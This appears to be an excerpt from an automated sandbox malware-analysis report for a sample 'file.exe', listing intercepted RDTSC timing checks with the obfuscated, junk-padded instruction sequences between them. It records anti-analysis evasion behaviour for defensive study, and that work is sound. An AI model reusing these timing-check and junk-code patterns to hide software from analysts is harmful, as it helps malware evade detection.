                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040115 second address: 5040197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD908C4C6F9h 0x0000000b or cx, 3656h 0x00000010 jmp 00007FD908C4C6F1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e jmp 00007FD908C4C6F9h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FD908C4C6EEh 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD908C4C6F7h 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070F29 second address: 5070F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070F2F second address: 5070F90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD908C4C6F0h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov bx, F984h 0x00000017 jmp 00007FD908C4C6EDh 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FD908C4C6EEh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD908C4C6F7h 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501010C second address: 5010162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD9092ECB2Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD9092ECB36h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD9092ECB30h 0x0000001c push dword ptr [ebp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010162 second address: 501022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007FD908C4C6F8h 0x0000000a call 00007FD908C4C6F2h 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 popad 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 pushad 0x00000016 pushad 0x00000017 mov ah, 98h 0x00000019 mov edx, 67D77F3Ah 0x0000001e popad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD908C4C6F1h 0x00000026 add si, 0BB6h 0x0000002b jmp 00007FD908C4C6F1h 0x00000030 popfd 0x00000031 mov ax, 25A7h 0x00000035 popad 0x00000036 popad 0x00000037 push dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FD908C4C6EFh 0x00000043 xor eax, 25F138EEh 0x00000049 jmp 00007FD908C4C6F9h 0x0000004e popfd 0x0000004f pushfd 0x00000050 jmp 00007FD908C4C6F0h 0x00000055 add si, 8068h 0x0000005a jmp 00007FD908C4C6EBh 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501022A second address: 5010242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB34h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501025D second address: 5010266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010266 second address: 501026A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501026A second address: 5010292 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD908C4C6EAh 0x00000008 or ax, D528h 0x0000000d jmp 00007FD908C4C6EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a movzx esi, bx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030CFF second address: 5030D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030D07 second address: 5030DCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FD908C4C6EEh 0x00000010 pushfd 0x00000011 jmp 00007FD908C4C6F2h 0x00000016 sub cx, 1108h 0x0000001b jmp 00007FD908C4C6EBh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD908C4C6EFh 0x0000002a sub al, 0000004Eh 0x0000002d jmp 00007FD908C4C6F9h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FD908C4C6F0h 0x00000039 sbb esi, 628905C8h 0x0000003f jmp 00007FD908C4C6EBh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007FD908C4C6EBh 0x00000050 jmp 00007FD908C4C6F3h 0x00000055 popfd 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030DCA second address: 5030DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB32h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030DE0 second address: 5030DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50308D1 second address: 50308D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50308D5 second address: 50308DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50308DB second address: 5030916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007FD9092ECB2Dh 0x0000000b and cl, FFFFFF96h 0x0000000e jmp 00007FD9092ECB31h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD9092ECB2Dh 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030916 second address: 503094C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 9882h 0x00000007 mov edi, 4C41BACEh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 mov al, AFh 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov esi, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007FD908C4C6F7h 0x00000023 pop ecx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503094C second address: 5030967 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FD9092ECB2Bh 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030967 second address: 503096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503096B second address: 5030971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030971 second address: 503098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6F9h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503098E second address: 5030992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030758 second address: 5030767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030767 second address: 50307DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD9092ECB2Fh 0x00000009 sbb eax, 6125EDBEh 0x0000000f jmp 00007FD9092ECB39h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD9092ECB30h 0x0000001b or ax, 76B8h 0x00000020 jmp 00007FD9092ECB2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FD9092ECB36h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 pop edi 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50307DF second address: 50307F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50307F9 second address: 50307FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50307FD second address: 5030801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030801 second address: 5030807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030807 second address: 503086F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 4F7FE2AFh 0x00000008 pushfd 0x00000009 jmp 00007FD908C4C6F4h 0x0000000e xor ecx, 2B1535D8h 0x00000014 jmp 00007FD908C4C6EBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FD908C4C6EBh 0x00000028 xor ax, D89Eh 0x0000002d jmp 00007FD908C4C6F9h 0x00000032 popfd 0x00000033 mov ecx, 44D5A467h 0x00000038 popad 0x00000039 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503086F second address: 5030875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030875 second address: 5030879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030879 second address: 50308A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007FD9092ECB2Ah 0x00000014 adc eax, 37B3B9C8h 0x0000001a jmp 00007FD9092ECB2Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50308A5 second address: 50308AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50308AB second address: 50308AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50303BF second address: 50303C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50303C6 second address: 50303F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD9092ECB32h 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD9092ECB33h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50303F7 second address: 5030461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 jmp 00007FD908C4C6EBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD908C4C6EBh 0x00000017 add si, C77Eh 0x0000001c jmp 00007FD908C4C6F9h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FD908C4C6F0h 0x00000028 jmp 00007FD908C4C6F5h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030461 second address: 50304AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007FD9092ECB33h 0x0000000c and ecx, 20B896EEh 0x00000012 jmp 00007FD9092ECB39h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD9092ECB2Dh 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304AF second address: 50304FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD908C4C6F7h 0x00000009 xor ax, E1AEh 0x0000000e jmp 00007FD908C4C6F9h 0x00000013 popfd 0x00000014 mov dl, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a pushad 0x0000001b mov edi, 68CA6F3Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 mov bx, B1E6h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50404BD second address: 50404D5 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 0DE6E2D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD9092ECB2Bh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50404D5 second address: 50404F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD908C4C6EFh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50404F5 second address: 50404FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50404FA second address: 504050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov bh, F8h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504050C second address: 504051B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504051B second address: 5040521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040521 second address: 5040525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040525 second address: 504055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a movsx ebx, si 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FD908C4C6F4h 0x00000015 adc si, 3E38h 0x0000001a jmp 00007FD908C4C6EBh 0x0000001f popfd 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505063D second address: 5050643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050643 second address: 505065B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505065B second address: 505065F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505065F second address: 5050671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050671 second address: 5050683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB2Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050683 second address: 50506B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bl, 29h 0x0000000c mov dx, si 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007FD908C4C6F0h 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ax, bx 0x00000020 mov ebx, 40A7DB1Ch 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50506B4 second address: 50506BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50506BA second address: 505071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e pushad 0x0000000f call 00007FD908C4C6EEh 0x00000014 pushfd 0x00000015 jmp 00007FD908C4C6F2h 0x0000001a and eax, 029E4298h 0x00000020 jmp 00007FD908C4C6EBh 0x00000025 popfd 0x00000026 pop esi 0x00000027 mov ecx, edi 0x00000029 popad 0x0000002a and dword ptr [eax+04h], 00000000h 0x0000002e jmp 00007FD908C4C6EBh 0x00000033 pop ebp 0x00000034 pushad 0x00000035 mov dh, ch 0x00000037 push eax 0x00000038 push edx 0x00000039 push edi 0x0000003a pop ecx 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50306B3 second address: 50306E9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 128BFCBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD9092ECB34h 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FD9092ECB2Dh 0x00000019 pop esi 0x0000001a mov bx, 1484h 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50306E9 second address: 50306EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50306EF second address: 5030711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD9092ECB37h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050431 second address: 5050435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050435 second address: 5050451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050451 second address: 5050457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050457 second address: 505045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505045B second address: 5050475 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050475 second address: 5050479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050479 second address: 505047F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505047F second address: 5050485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050485 second address: 505049D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dl, DAh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505049D second address: 50504F9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD9092ECB38h 0x00000008 sub si, DE28h 0x0000000d jmp 00007FD9092ECB2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov bl, al 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FD9092ECB2Bh 0x0000001e mov ebp, esp 0x00000020 jmp 00007FD9092ECB36h 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50504F9 second address: 50504FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50504FD second address: 5050503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50706F4 second address: 50706F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50706F8 second address: 50706FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50706FC second address: 5070702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070702 second address: 5070718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB32h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070718 second address: 5070748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD908C4C6F6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070748 second address: 507074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507074C second address: 5070750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070750 second address: 5070756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070756 second address: 5070765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6EBh 0x00000009 rdtsc
